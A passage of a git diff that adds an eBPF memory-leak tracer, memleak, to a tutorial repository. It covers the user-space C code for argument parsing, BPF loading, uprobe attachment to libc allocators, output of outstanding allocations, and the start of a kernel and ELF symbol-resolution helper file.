argp_args_doc[] = +"Trace outstanding memory allocations\n" +"\n" +"USAGE: memleak [-h] [-c COMMAND] [-p PID] [-t] [-n] [-a] [-o AGE_MS] [-C] [-F] [-s SAMPLE_RATE] [-T TOP_STACKS] [-z MIN_SIZE] [-Z MAX_SIZE] [-O OBJECT] [-P] [INTERVAL] [INTERVALS]\n" +"\n" +"EXAMPLES:\n" +"./memleak -p $(pidof allocs)\n" +" Trace allocations and display a summary of 'leaked' (outstanding)\n" +" allocations every 5 seconds\n" +"./memleak -p $(pidof allocs) -t\n" +" Trace allocations and display each individual allocator function call\n" +"./memleak -ap $(pidof allocs) 10\n" +" Trace allocations and display allocated addresses, sizes, and stacks\n" +" every 10 seconds for outstanding allocations\n" +"./memleak -c './allocs'\n" +" Run the specified command and trace its allocations\n" +"./memleak\n" +" Trace allocations in kernel mode and display a summary of outstanding\n" +" allocations every 5 seconds\n" +"./memleak -o 60000\n" +" Trace allocations in kernel mode and display a summary of outstanding\n" +" allocations that are at least one minute (60 seconds) old\n" +"./memleak -s 5\n" +" Trace roughly every 5th allocation, to reduce overhead\n" +""; + +static const struct argp_option argp_options[] = { + // name/longopt:str, key/shortopt:int, arg:str, flags:int, doc:str + {"pid", 'p', "PID", 0, "process ID to trace. if not specified, trace kernel allocs"}, + {"trace", 't', 0, 0, "print trace messages for each alloc/free call" }, + {"show-allocs", 'a', 0, 0, "show allocation addresses and sizes as well as call stacks"}, + {"older", 'o', "AGE_MS", 0, "prune allocations younger than this age in milliseconds"}, + {"command", 'c', "COMMAND", 0, "execute and trace the specified command"}, + {"combined-only", 'C', 0, 0, "show combined allocation statistics only"}, + {"wa-missing-free", 'F', 0, 0, "workaround to alleviate misjudgments when free is missing"}, + {"sample-rate", 's', "SAMPLE_RATE", 0, "sample every N-th allocation to decrease the overhead"}, + {"top", 'T', "TOP_STACKS", 0, "display only this many top allocating stacks (by size)"}, + {"min-size", 'z', "MIN_SIZE", 0, "capture only allocations larger than this size"}, + {"max-size", 'Z', "MAX_SIZE", 0, "capture only allocations smaller than this size"}, + {"obj", 'O', "OBJECT", 0, "attach to allocator functions in the specified object"}, + {"percpu", 'P', NULL, 0, "trace percpu allocations"}, + {}, +}; + +static volatile sig_atomic_t exiting; +static volatile sig_atomic_t child_exited; + +static struct sigaction sig_action = { + .sa_handler = sig_handler +}; + +static int child_exec_event_fd = -1; + +#ifdef USE_BLAZESYM +static blazesym *symbolizer; +static sym_src_cfg src_cfg; +#else +struct syms_cache *syms_cache; +struct ksyms *ksyms; +#endif +static void (*print_stack_frames_func)(); + +static uint64_t *stack; + +static struct allocation *allocs; + +static const char default_object[] = "libc.so.6"; + +int main(int argc, char *argv[]) +{ + int ret = 0; + struct memleak_bpf *skel = NULL; + + static const struct argp argp = { + .options = argp_options, + .parser = argp_parse_arg, + .doc = argp_args_doc, + }; + + // parse command line args to env settings + if (argp_parse(&argp, argc, argv, 0, NULL, NULL)) { + fprintf(stderr, "failed to parse args\n"); + + goto cleanup; + } + + // install signal handler + if (sigaction(SIGINT, &sig_action, NULL) || sigaction(SIGCHLD, &sig_action, NULL)) { + perror("failed to set up signal handling"); + ret = -errno; + + goto cleanup; + } + + // post-processing and validation of env settings + if (env.min_size > env.max_size) { + fprintf(stderr, "min size (-z) can't be greater than max_size (-Z)\n"); + return 1; + } + + if (!strlen(env.object)) { + printf("using default object: %s\n", default_object); + strncpy(env.object, default_object, sizeof(env.object) - 1); + } + + env.page_size = sysconf(_SC_PAGE_SIZE); + printf("using page size: %ld\n", env.page_size); + + env.kernel_trace = env.pid < 0 && !strlen(env.command); + printf("tracing kernel: %s\n", env.kernel_trace ? "true" : "false"); + + // if specific userspace program was specified, + // create the child process and use an eventfd to synchronize the call to exec() + if (strlen(env.command)) { + if (env.pid >= 0) { + fprintf(stderr, "cannot specify both command and pid\n"); + ret = 1; + + goto cleanup; + } + + if (event_init(&child_exec_event_fd)) { + fprintf(stderr, "failed to init child event\n"); + + goto cleanup; + } + + const pid_t child_pid = fork_sync_exec(env.command, child_exec_event_fd); + if (child_pid < 0) { + perror("failed to spawn child process"); + ret = -errno; + + goto cleanup; + } + + env.pid = child_pid; + } + + // allocate space for storing a stack trace + stack = calloc(env.perf_max_stack_depth, sizeof(*stack)); + if (!stack) { + fprintf(stderr, "failed to allocate stack array\n"); + ret = -ENOMEM; + + goto cleanup; + } + +#ifdef USE_BLAZESYM + if (env.pid < 0) { + src_cfg.src_type = SRC_T_KERNEL; + src_cfg.params.kernel.kallsyms = NULL; + src_cfg.params.kernel.kernel_image = NULL; + } else { + src_cfg.src_type = SRC_T_PROCESS; + src_cfg.params.process.pid = env.pid; + } +#endif + + // allocate space for storing "allocation" structs + if (env.combined_only) + allocs = calloc(COMBINED_ALLOCS_MAX_ENTRIES, sizeof(*allocs)); + else + allocs = calloc(ALLOCS_MAX_ENTRIES, sizeof(*allocs)); + + if (!allocs) { + fprintf(stderr, "failed to allocate array\n"); + ret = -ENOMEM; + + goto cleanup; + } + + libbpf_set_print(libbpf_print_fn); + + skel = memleak_bpf__open(); + if (!skel) { + fprintf(stderr, "failed to open bpf object\n"); + ret = 1; + + goto cleanup; + } + + skel->rodata->min_size = env.min_size; + skel->rodata->max_size = env.max_size; + skel->rodata->page_size = env.page_size; + skel->rodata->sample_rate = env.sample_rate; + skel->rodata->trace_all = env.trace_all; + skel->rodata->stack_flags = env.kernel_trace ? 0 : BPF_F_USER_STACK; + skel->rodata->wa_missing_free = env.wa_missing_free; + + bpf_map__set_value_size(skel->maps.stack_traces, + env.perf_max_stack_depth * sizeof(unsigned long)); + bpf_map__set_max_entries(skel->maps.stack_traces, env.stack_map_max_entries); + + // disable kernel tracepoints based on settings or availability + if (env.kernel_trace) { + if (!has_kernel_node_tracepoints()) + disable_kernel_node_tracepoints(skel); + + if (!env.percpu) + disable_kernel_percpu_tracepoints(skel); + } else { + disable_kernel_tracepoints(skel); + } + + ret = memleak_bpf__load(skel); + if (ret) { + fprintf(stderr, "failed to load bpf object\n"); + + goto cleanup; + } + + const int allocs_fd = bpf_map__fd(skel->maps.allocs); + const int combined_allocs_fd = bpf_map__fd(skel->maps.combined_allocs); + const int stack_traces_fd = bpf_map__fd(skel->maps.stack_traces); + + // if userspace oriented, attach upbrobes + if (!env.kernel_trace) { + ret = attach_uprobes(skel); + if (ret) { + fprintf(stderr, "failed to attach uprobes\n"); + + goto cleanup; + } + } + + ret = memleak_bpf__attach(skel); + if (ret) { + fprintf(stderr, "failed to attach bpf program(s)\n"); + + goto cleanup; + } + + // if running a specific userspace program, + // notify the child process that it can exec its program + if (strlen(env.command)) { + ret = event_notify(child_exec_event_fd, 1); + if (ret) { + fprintf(stderr, "failed to notify child to perform exec\n"); + + goto cleanup; + } + } + +#ifdef USE_BLAZESYM + symbolizer = blazesym_new(); + if (!symbolizer) { + fprintf(stderr, "Failed to load blazesym\n"); + ret = -ENOMEM; + + goto cleanup; + } + print_stack_frames_func = print_stack_frames_by_blazesym; +#else + if (env.kernel_trace) { + ksyms = ksyms__load(); + if (!ksyms) { + fprintf(stderr, "Failed to load ksyms\n"); + ret = -ENOMEM; + + goto cleanup; + } + print_stack_frames_func = print_stack_frames_by_ksyms; + } else { + syms_cache = syms_cache__new(0); + if (!syms_cache) { + fprintf(stderr, "Failed to create syms_cache\n"); + ret = -ENOMEM; + + goto cleanup; + } + print_stack_frames_func = print_stack_frames_by_syms_cache; + } +#endif + + printf("Tracing outstanding memory allocs... Hit Ctrl-C to end\n"); + + // main loop + while (!exiting && env.nr_intervals) { + env.nr_intervals--; + + sleep(env.interval); + + if (env.combined_only) + print_outstanding_combined_allocs(combined_allocs_fd, stack_traces_fd); + else + print_outstanding_allocs(allocs_fd, stack_traces_fd); + } + + // after loop ends, check for child process and cleanup accordingly + if (env.pid > 0 && strlen(env.command)) { + if (!child_exited) { + if (kill(env.pid, SIGTERM)) { + perror("failed to signal child process"); + ret = -errno; + + goto cleanup; + } + printf("signaled child process\n"); + } + + if (waitpid(env.pid, NULL, 0) < 0) { + perror("failed to reap child process"); + ret = -errno; + + goto cleanup; + } + printf("reaped child process\n"); + } + +cleanup: +#ifdef USE_BLAZESYM + blazesym_free(symbolizer); +#else + if (syms_cache) + syms_cache__free(syms_cache); + if (ksyms) + ksyms__free(ksyms); +#endif + memleak_bpf__destroy(skel); + + free(allocs); + free(stack); + + printf("done\n"); + + return ret; +} + +long argp_parse_long(int key, const char *arg, struct argp_state *state) +{ + errno = 0; + const long temp = strtol(arg, NULL, 10); + if (errno || temp <= 0) { + fprintf(stderr, "error arg:%c %s\n", (char)key, arg); + argp_usage(state); + } + + return temp; +} + +error_t argp_parse_arg(int key, char *arg, struct argp_state *state) +{ + static int pos_args = 0; + + switch (key) { + case 'p': + env.pid = atoi(arg); + break; + case 't': + env.trace_all = true; + break; + case 'a': + env.show_allocs = true; + break; + case 'o': + env.min_age_ns = 1e6 * atoi(arg); + break; + case 'c': + strncpy(env.command, arg, sizeof(env.command) - 1); + break; + case 'C': + env.combined_only = true; + break; + case 'F': + env.wa_missing_free = true; + break; + case 's': + env.sample_rate = argp_parse_long(key, arg, state); + break; + case 'T': + env.top_stacks = atoi(arg); + break; + case 'z': + env.min_size = argp_parse_long(key, arg, state); + break; + case 'Z': + env.max_size = argp_parse_long(key, arg, state); + break; + case 'O': + strncpy(env.object, arg, sizeof(env.object) - 1); + break; + case 'P': + env.percpu = true; + break; + case ARGP_KEY_ARG: + pos_args++; + + if (pos_args == 1) { + env.interval = argp_parse_long(key, arg, state); + } + else if (pos_args == 2) { + env.nr_intervals = argp_parse_long(key, arg, state); + } else { + fprintf(stderr, "Unrecognized positional argument: %s\n", arg); + argp_usage(state); + } + + break; + default: + return ARGP_ERR_UNKNOWN; + } + + return 0; +} + +int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args) +{ + if (level == LIBBPF_DEBUG && !env.verbose) + return 0; + + return vfprintf(stderr, format, args); +} + +void sig_handler(int signo) +{ + if (signo == SIGCHLD) + child_exited = 1; + + exiting = 1; +} + +int event_init(int *fd) +{ + if (!fd) { + fprintf(stderr, "pointer to fd is null\n"); + + return 1; + } + + const int tmp_fd = eventfd(0, EFD_CLOEXEC); + if (tmp_fd < 0) { + perror("failed to create event fd"); + + return -errno; + } + + *fd = tmp_fd; + + return 0; +} + +int event_wait(int fd, uint64_t expected_event) +{ + uint64_t event = 0; + const ssize_t bytes = read(fd, &event, sizeof(event)); + if (bytes < 0) { + perror("failed to read from fd"); + + return -errno; + } else if (bytes != sizeof(event)) { + fprintf(stderr, "read unexpected size\n"); + + return 1; + } + + if (event != expected_event) { + fprintf(stderr, "read event %lu, expected %lu\n", event, expected_event); + + return 1; + } + + return 0; +} + +int event_notify(int fd, uint64_t event) +{ + const ssize_t bytes = write(fd, &event, sizeof(event)); + if (bytes < 0) { + perror("failed to write to fd"); + + return -errno; + } else if (bytes != sizeof(event)) { + fprintf(stderr, "attempted to write %zu bytes, wrote %zd bytes\n", sizeof(event), bytes); + + return 1; + } + + return 0; +} + +pid_t fork_sync_exec(const char *command, int fd) +{ + const pid_t pid = fork(); + + switch (pid) { + case -1: + perror("failed to create child process"); + break; + case 0: { + const uint64_t event = 1; + if (event_wait(fd, event)) { + fprintf(stderr, "failed to wait on event"); + exit(EXIT_FAILURE); + } + + printf("received go event. executing child command\n"); + + const int err = execl(command, command, NULL); + if (err) { + perror("failed to execute child command"); + return -1; + } + + break; + } + default: + printf("child created with pid: %d\n", pid); + + break; + } + + return pid; +} + +#if USE_BLAZESYM +void print_stack_frame_by_blazesym(size_t frame, uint64_t addr, const blazesym_csym *sym) +{ + if (!sym) + printf("\t%zu [<%016lx>] <%s>\n", frame, addr, "null sym"); + else if (sym->path && strlen(sym->path)) + printf("\t%zu [<%016lx>] %s+0x%lx %s:%ld\n", frame, addr, sym->symbol, addr - sym->start_address, sym->path, sym->line_no); + else + printf("\t%zu [<%016lx>] %s+0x%lx\n", frame, addr, sym->symbol, addr - sym->start_address); +} + +void print_stack_frames_by_blazesym() +{ + const blazesym_result *result = blazesym_symbolize(symbolizer, &src_cfg, 1, stack, env.perf_max_stack_depth); + + for (size_t j = 0; j < result->size; ++j) { + const uint64_t addr = stack[j]; + + if (addr == 0) + break; + + // no symbol found + if (!result || j >= result->size || result->entries[j].size == 0) { + print_stack_frame_by_blazesym(j, addr, NULL); + + continue; + } + + // single symbol found + if (result->entries[j].size == 1) { + const blazesym_csym *sym = &result->entries[j].syms[0]; + print_stack_frame_by_blazesym(j, addr, sym); + + continue; + } + + // multi symbol found + printf("\t%zu [<%016lx>] (%lu entries)\n", j, addr, result->entries[j].size); + + for (size_t k = 0; k < result->entries[j].size; ++k) { + const blazesym_csym *sym = &result->entries[j].syms[k]; + if (sym->path && strlen(sym->path)) + printf("\t\t%s@0x%lx %s:%ld\n", sym->symbol, sym->start_address, sym->path, sym->line_no); + else + printf("\t\t%s@0x%lx\n", sym->symbol, sym->start_address); + } + } + + blazesym_result_free(result); +} +#else +void print_stack_frames_by_ksyms() +{ + for (size_t i = 0; i < env.perf_max_stack_depth; ++i) { + const uint64_t addr = stack[i]; + + if (addr == 0) + break; + + const struct ksym *ksym = ksyms__map_addr(ksyms, addr); + if (ksym) + printf("\t%zu [<%016lx>] %s+0x%lx\n", i, addr, ksym->name, addr - ksym->addr); + else + printf("\t%zu [<%016lx>] <%s>\n", i, addr, "null sym"); + } +} + +void print_stack_frames_by_syms_cache() +{ + const struct syms *syms = syms_cache__get_syms(syms_cache, env.pid); + if (!syms) { + fprintf(stderr, "Failed to get syms\n"); + return; + } + + for (size_t i = 0; i < env.perf_max_stack_depth; ++i) { + const uint64_t addr = stack[i]; + + if (addr == 0) + break; + + char *dso_name; + uint64_t dso_offset; + const struct sym *sym = syms__map_addr_dso(syms, addr, &dso_name, &dso_offset); + if (sym) { + printf("\t%zu [<%016lx>] %s+0x%lx", i, addr, sym->name, sym->offset); + if (dso_name) + printf(" [%s]", dso_name); + printf("\n"); + } else { + printf("\t%zu [<%016lx>] <%s>\n", i, addr, "null sym"); + } + } +} +#endif + +int print_stack_frames(struct allocation *allocs, size_t nr_allocs, int stack_traces_fd) +{ + for (size_t i = 0; i < nr_allocs; ++i) { + const struct allocation *alloc = &allocs[i]; + + printf("%zu bytes in %zu allocations from stack\n", alloc->size, alloc->count); + + if (env.show_allocs) { + struct allocation_node* it = alloc->allocations; + while (it != NULL) { + printf("\taddr = %#lx size = %zu\n", it->address, it->size); + it = it->next; + } + } + + if (bpf_map_lookup_elem(stack_traces_fd, &alloc->stack_id, stack)) { + if (errno == ENOENT) + continue; + + perror("failed to lookup stack trace"); + + return -errno; + } + + (*print_stack_frames_func)(); + } + + return 0; +} + +int alloc_size_compare(const void *a, const void *b) +{ + const struct allocation *x = (struct allocation *)a; + const struct allocation *y = (struct allocation *)b; + + // descending order + + if (x->size > y->size) + return -1; + + if (x->size < y->size) + return 1; + + return 0; +} + +int print_outstanding_allocs(int allocs_fd, int stack_traces_fd) +{ + time_t t = time(NULL); + struct tm *tm = localtime(&t); + + size_t nr_allocs = 0; + + // for each struct alloc_info "alloc_info" in the bpf map "allocs" + for (uint64_t prev_key = 0, curr_key = 0;; prev_key = curr_key) { + struct alloc_info alloc_info = {}; + memset(&alloc_info, 0, sizeof(alloc_info)); + + if (bpf_map_get_next_key(allocs_fd, &prev_key, &curr_key)) { + if (errno == ENOENT) { + break; // no more keys, done + } + + perror("map get next key error"); + + return -errno; + } + + if (bpf_map_lookup_elem(allocs_fd, &curr_key, &alloc_info)) { + if (errno == ENOENT) + continue; + + perror("map lookup error"); + + return -errno; + } + + // filter by age + if (get_ktime_ns() - env.min_age_ns < alloc_info.timestamp_ns) { + continue; + } + + // filter invalid stacks + if (alloc_info.stack_id < 0) { + continue; + } + + // when the stack_id exists in the allocs array, + // increment size with alloc_info.size + bool stack_exists = false; + + for (size_t i = 0; !stack_exists && i < nr_allocs; ++i) { + struct allocation *alloc = &allocs[i]; + + if (alloc->stack_id == alloc_info.stack_id) { + alloc->size += alloc_info.size; + alloc->count++; + + if (env.show_allocs) { + struct allocation_node* node = malloc(sizeof(struct allocation_node)); + if (!node) { + perror("malloc failed"); + return -errno; + } + node->address = curr_key; + node->size = alloc_info.size; + node->next = alloc->allocations; + alloc->allocations = node; + } + + stack_exists = true; + break; + } + } + + if (stack_exists) + continue; + + // when the stack_id does not exist in the allocs array, + // create a new entry in the array + struct allocation alloc = { + .stack_id = alloc_info.stack_id, + .size = alloc_info.size, + .count = 1, + .allocations = NULL + }; + + if (env.show_allocs) { + struct allocation_node* node = malloc(sizeof(struct allocation_node)); + if (!node) { + perror("malloc failed"); + return -errno; + } + node->address = curr_key; + node->size = alloc_info.size; + node->next = NULL; + alloc.allocations = node; + } + + memcpy(&allocs[nr_allocs], &alloc, sizeof(alloc)); + nr_allocs++; + } + + // sort the allocs array in descending order + qsort(allocs, nr_allocs, sizeof(allocs[0]), alloc_size_compare); + + // get min of allocs we stored vs the top N requested stacks + size_t nr_allocs_to_show = nr_allocs < env.top_stacks ? nr_allocs : env.top_stacks; + + printf("[%d:%d:%d] Top %zu stacks with outstanding allocations:\n", + tm->tm_hour, tm->tm_min, tm->tm_sec, nr_allocs_to_show); + + print_stack_frames(allocs, nr_allocs_to_show, stack_traces_fd); + + // Reset allocs list so that we dont accidentaly reuse data the next time we call this function + for (size_t i = 0; i < nr_allocs; i++) { + allocs[i].stack_id = 0; + if (env.show_allocs) { + struct allocation_node *it = allocs[i].allocations; + while (it != NULL) { + struct allocation_node *this = it; + it = it->next; + free(this); + } + allocs[i].allocations = NULL; + } + } + + return 0; +} + +int print_outstanding_combined_allocs(int combined_allocs_fd, int stack_traces_fd) +{ + time_t t = time(NULL); + struct tm *tm = localtime(&t); + + size_t nr_allocs = 0; + + // for each stack_id "curr_key" and union combined_alloc_info "alloc" + // in bpf_map "combined_allocs" + for (uint64_t prev_key = 0, curr_key = 0;; prev_key = curr_key) { + union combined_alloc_info combined_alloc_info; + memset(&combined_alloc_info, 0, sizeof(combined_alloc_info)); + + if (bpf_map_get_next_key(combined_allocs_fd, &prev_key, &curr_key)) { + if (errno == ENOENT) { + break; // no more keys, done + } + + perror("map get next key error"); + + return -errno; + } + + if (bpf_map_lookup_elem(combined_allocs_fd, &curr_key, &combined_alloc_info)) { + if (errno == ENOENT) + continue; + + perror("map lookup error"); + + return -errno; + } + + const struct allocation alloc = { + .stack_id = curr_key, + .size = combined_alloc_info.total_size, + .count = combined_alloc_info.number_of_allocs, + .allocations = NULL + }; + + memcpy(&allocs[nr_allocs], &alloc, sizeof(alloc)); + nr_allocs++; + } + + qsort(allocs, nr_allocs, sizeof(allocs[0]), alloc_size_compare); + + // get min of allocs we stored vs the top N requested stacks + nr_allocs = nr_allocs < env.top_stacks ? nr_allocs : env.top_stacks; + + printf("[%d:%d:%d] Top %zu stacks with outstanding allocations:\n", + tm->tm_hour, tm->tm_min, tm->tm_sec, nr_allocs); + + print_stack_frames(allocs, nr_allocs, stack_traces_fd); + + return 0; +} + +bool has_kernel_node_tracepoints() +{ + return tracepoint_exists("kmem", "kmalloc_node") && + tracepoint_exists("kmem", "kmem_cache_alloc_node"); +} + +void disable_kernel_node_tracepoints(struct memleak_bpf *skel) +{ + bpf_program__set_autoload(skel->progs.memleak__kmalloc_node, false); + bpf_program__set_autoload(skel->progs.memleak__kmem_cache_alloc_node, false); +} + +void disable_kernel_percpu_tracepoints(struct memleak_bpf *skel) +{ + bpf_program__set_autoload(skel->progs.memleak__percpu_alloc_percpu, false); + bpf_program__set_autoload(skel->progs.memleak__percpu_free_percpu, false); +} + +void disable_kernel_tracepoints(struct memleak_bpf *skel) +{ + bpf_program__set_autoload(skel->progs.memleak__kmalloc, false); + bpf_program__set_autoload(skel->progs.memleak__kmalloc_node, false); + bpf_program__set_autoload(skel->progs.memleak__kfree, false); + bpf_program__set_autoload(skel->progs.memleak__kmem_cache_alloc, false); + bpf_program__set_autoload(skel->progs.memleak__kmem_cache_alloc_node, false); + bpf_program__set_autoload(skel->progs.memleak__kmem_cache_free, false); + bpf_program__set_autoload(skel->progs.memleak__mm_page_alloc, false); + bpf_program__set_autoload(skel->progs.memleak__mm_page_free, false); + bpf_program__set_autoload(skel->progs.memleak__percpu_alloc_percpu, false); + bpf_program__set_autoload(skel->progs.memleak__percpu_free_percpu, false); +} + +int attach_uprobes(struct memleak_bpf *skel) +{ + ATTACH_UPROBE_CHECKED(skel, malloc, malloc_enter); + ATTACH_URETPROBE_CHECKED(skel, malloc, malloc_exit); + + ATTACH_UPROBE_CHECKED(skel, calloc, calloc_enter); + ATTACH_URETPROBE_CHECKED(skel, calloc, calloc_exit); + + ATTACH_UPROBE_CHECKED(skel, realloc, realloc_enter); + ATTACH_URETPROBE_CHECKED(skel, realloc, realloc_exit); + + ATTACH_UPROBE_CHECKED(skel, mmap, mmap_enter); + ATTACH_URETPROBE_CHECKED(skel, mmap, mmap_exit); + + ATTACH_UPROBE_CHECKED(skel, posix_memalign, posix_memalign_enter); + ATTACH_URETPROBE_CHECKED(skel, posix_memalign, posix_memalign_exit); + + ATTACH_UPROBE_CHECKED(skel, memalign, memalign_enter); + ATTACH_URETPROBE_CHECKED(skel, memalign, memalign_exit); + + ATTACH_UPROBE_CHECKED(skel, free, free_enter); + ATTACH_UPROBE_CHECKED(skel, munmap, munmap_enter); + + // the following probes are intentinally allowed to fail attachment + + // deprecated in libc.so bionic + ATTACH_UPROBE(skel, valloc, valloc_enter); + ATTACH_URETPROBE(skel, valloc, valloc_exit); + + // deprecated in libc.so bionic + ATTACH_UPROBE(skel, pvalloc, pvalloc_enter); + ATTACH_URETPROBE(skel, pvalloc, pvalloc_exit); + + // added in C11 + ATTACH_UPROBE(skel, aligned_alloc, aligned_alloc_enter); + ATTACH_URETPROBE(skel, aligned_alloc, aligned_alloc_exit); + + return 0; +} diff --git a/16-memleak/trace_helpers.c b/16-memleak/trace_helpers.c new file mode 100644 index 0000000..89c4835 --- /dev/null +++ b/16-memleak/trace_helpers.c @@ -0,0 +1,1202 @@ +/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ +// Copyright (c) 2020 Wenbo Zhang +// +// Based on ksyms improvements from Andrii Nakryiko, add more helpers. +// 28-Feb-2020 Wenbo Zhang Created this. +#ifndef _GNU_SOURCE +#define _GNU_SOURCE +#endif +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "trace_helpers.h" +#include "uprobe_helpers.h" + +#define min(x, y) ({ \ + typeof(x) _min1 = (x); \ + typeof(y) _min2 = (y); \ + (void) (&_min1 == &_min2); \ + _min1 < _min2 ? _min1 : _min2; }) + +#define DISK_NAME_LEN 32 + +#define MINORBITS 20 +#define MINORMASK ((1U << MINORBITS) - 1) + +#define MKDEV(ma, mi) (((ma) << MINORBITS) | (mi)) + +struct ksyms { + struct ksym *syms; + int syms_sz; + int syms_cap; + char *strs; + int strs_sz; + int strs_cap; +}; + +static int ksyms__add_symbol(struct ksyms *ksyms, const char *name, unsigned long addr) +{ + size_t new_cap, name_len = strlen(name) + 1; + struct ksym *ksym; + void *tmp; + + if (ksyms->strs_sz + name_len > ksyms->strs_cap) { + new_cap = ksyms->strs_cap * 4 / 3; + if (new_cap < ksyms->strs_sz + name_len) + new_cap = ksyms->strs_sz + name_len; + if (new_cap < 1024) + new_cap = 1024; + tmp = realloc(ksyms->strs, new_cap); + if (!tmp) + return -1; + ksyms->strs = tmp; + ksyms->strs_cap = new_cap; + } + if (ksyms->syms_sz + 1 > ksyms->syms_cap) { + new_cap = ksyms->syms_cap * 4 / 3; + if (new_cap < 1024) + new_cap = 1024; + tmp = realloc(ksyms->syms, sizeof(*ksyms->syms) * new_cap); + if (!tmp) + return -1; + ksyms->syms = tmp; + ksyms->syms_cap = new_cap; + } + + ksym = &ksyms->syms[ksyms->syms_sz]; + /* while constructing, re-use pointer as just a plain offset */ + ksym->name = (void *)(unsigned long)ksyms->strs_sz; + ksym->addr = addr; + + memcpy(ksyms->strs + ksyms->strs_sz, name, name_len); + ksyms->strs_sz += name_len; + ksyms->syms_sz++; + + return 0; +} + +static int ksym_cmp(const void *p1, const void *p2) +{ + const struct ksym *s1 = p1, *s2 = p2; + + if (s1->addr == s2->addr) + return strcmp(s1->name, s2->name); + return s1->addr < s2->addr ? -1 : 1; +} + +struct ksyms *ksyms__load(void) +{ + char sym_type, sym_name[256]; + struct ksyms *ksyms; + unsigned long sym_addr; + int i, ret; + FILE *f; + + f = fopen("/proc/kallsyms", "r"); + if (!f) + return NULL; + + ksyms = calloc(1, sizeof(*ksyms)); + if (!ksyms) + goto err_out; + + while (true) { + ret = fscanf(f, "%lx %c %s%*[^\n]\n", + &sym_addr, &sym_type, sym_name); + if (ret == EOF && feof(f)) + break; + if (ret != 3) + goto err_out; + if (ksyms__add_symbol(ksyms, sym_name, sym_addr)) + goto err_out; + } + + /* now when strings are finalized, adjust pointers properly */ + for (i = 0; i < ksyms->syms_sz; i++) + ksyms->syms[i].name += (unsigned long)ksyms->strs; + + qsort(ksyms->syms, ksyms->syms_sz, sizeof(*ksyms->syms), ksym_cmp); + + fclose(f); + return ksyms; + +err_out: + ksyms__free(ksyms); + fclose(f); + return NULL; +} + +void ksyms__free(struct ksyms *ksyms) +{ + if (!ksyms) + return; + + free(ksyms->syms); + free(ksyms->strs); + free(ksyms); +} + +const struct ksym *ksyms__map_addr(const struct ksyms *ksyms, + unsigned long addr) +{ + int start = 0, end = ksyms->syms_sz - 1, mid; + unsigned long sym_addr; + + /* find largest sym_addr <= addr using binary search */ + while (start < end) { + mid = start + (end - start + 1) / 2; + sym_addr = ksyms->syms[mid].addr; + + if (sym_addr <= addr) + start = mid; + else + end = mid - 1; + } + + if (start == end && ksyms->syms[start].addr <= addr) + return &ksyms->syms[start]; + return NULL; +} + +const struct ksym *ksyms__get_symbol(const struct ksyms *ksyms, + const char *name) +{ + int i; + + for (i = 0; i < ksyms->syms_sz; i++) { + if (strcmp(ksyms->syms[i].name, name) == 0) + return &ksyms->syms[i]; + } + + return NULL; +} + +struct load_range { + uint64_t start; + uint64_t end; + uint64_t file_off; +}; + +enum elf_type { + EXEC, + DYN, + PERF_MAP, + VDSO, + UNKNOWN, +}; + +struct dso { + char *name; + struct load_range *ranges; + int range_sz; + /* Dyn's first text section virtual addr at execution */ + uint64_t sh_addr; + /* Dyn's first text section file offset */ + uint64_t sh_offset; + enum elf_type type; + + struct sym *syms; + int syms_sz; + int syms_cap; + + /* + * libbpf's struct btf is actually a pretty efficient + * "set of strings" data structure, so we create an + * empty one and use it to store symbol names. + */ + struct btf *btf; +}; + +struct map { + uint64_t start_addr; + uint64_t end_addr; + uint64_t file_off; + uint64_t dev_major; + uint64_t dev_minor; + uint64_t inode; +}; + +struct syms { + struct dso *dsos; + int dso_sz; +}; + +static bool is_file_backed(const char *mapname) +{ +#define STARTS_WITH(mapname, prefix) \ + (!strncmp(mapname, prefix, sizeof(prefix) - 1)) + + return mapname[0] && !( + STARTS_WITH(mapname, "//anon") || + STARTS_WITH(mapname, "/dev/zero") || + STARTS_WITH(mapname, "/anon_hugepage") || + STARTS_WITH(mapname, "[stack") || + STARTS_WITH(mapname, "/SYSV") || + STARTS_WITH(mapname, "[heap]") || + STARTS_WITH(mapname, "[vsyscall]")); +} + +static bool is_perf_map(const char *path) +{ + return false; +} + +static bool is_vdso(const char *path) +{ + return !strcmp(path, "[vdso]"); +} + +static int get_elf_type(const char *path) +{ + GElf_Ehdr hdr; + void *res; + Elf *e; + int fd; + + if (is_vdso(path)) + return -1; + e = open_elf(path, &fd); + if (!e) + return -1; + res = gelf_getehdr(e, &hdr); + close_elf(e, fd); + if (!res) + return -1; + return hdr.e_type; +} + +static int get_elf_text_scn_info(const char *path, uint64_t *addr, + uint64_t *offset) +{ + Elf_Scn *section = NULL; + int fd = -1, err = -1; + GElf_Shdr header; + size_t stridx; + Elf *e = NULL; + char *name; + + e = open_elf(path, &fd); + if (!e) + goto err_out; + err = elf_getshdrstrndx(e, &stridx); + if (err < 0) + goto err_out; + + err = -1; + while ((section = elf_nextscn(e, section)) != 0) { + if (!gelf_getshdr(section, &header)) + continue; + + name = elf_strptr(e, stridx, header.sh_name); + if (name && !strcmp(name, ".text")) { + *addr = (uint64_t)header.sh_addr; + *offset = (uint64_t)header.sh_offset; + err = 0; + break; + } + } + +err_out: + close_elf(e, fd); + return err; +} + +static int syms__add_dso(struct syms *syms, struct map *map, const char *name) +{ + struct dso *dso = NULL; + int i, type; + void *tmp; + + for (i = 0; i < syms->dso_sz; i++) { + if (!strcmp(syms->dsos[i].name, name)) { + dso = &syms->dsos[i]; + break; + } + } + + if (!dso) { + tmp = realloc(syms->dsos, (syms->dso_sz + 1) * + sizeof(*syms->dsos)); + if (!tmp) + return -1; + syms->dsos = tmp; + dso = &syms->dsos[syms->dso_sz++]; + memset(dso, 0, sizeof(*dso)); + dso->name = strdup(name); + dso->btf = btf__new_empty(); + } + + tmp = realloc(dso->ranges, (dso->range_sz + 1) * sizeof(*dso->ranges)); + if (!tmp) + return -1; + dso->ranges = tmp; + dso->ranges[dso->range_sz].start = map->start_addr; + dso->ranges[dso->range_sz].end = map->end_addr; + dso->ranges[dso->range_sz].file_off = map->file_off; + dso->range_sz++; + type = get_elf_type(name); + if (type == ET_EXEC) { + dso->type = EXEC; + } else if (type == ET_DYN) { + dso->type = DYN; + if (get_elf_text_scn_info(name, &dso->sh_addr, &dso->sh_offset) < 0) + return -1; + } else if (is_perf_map(name)) { + dso->type = PERF_MAP; + } else if (is_vdso(name)) { + dso->type = VDSO; + } else { + dso->type = UNKNOWN; + } + return 0; +} + +static struct dso *syms__find_dso(const struct 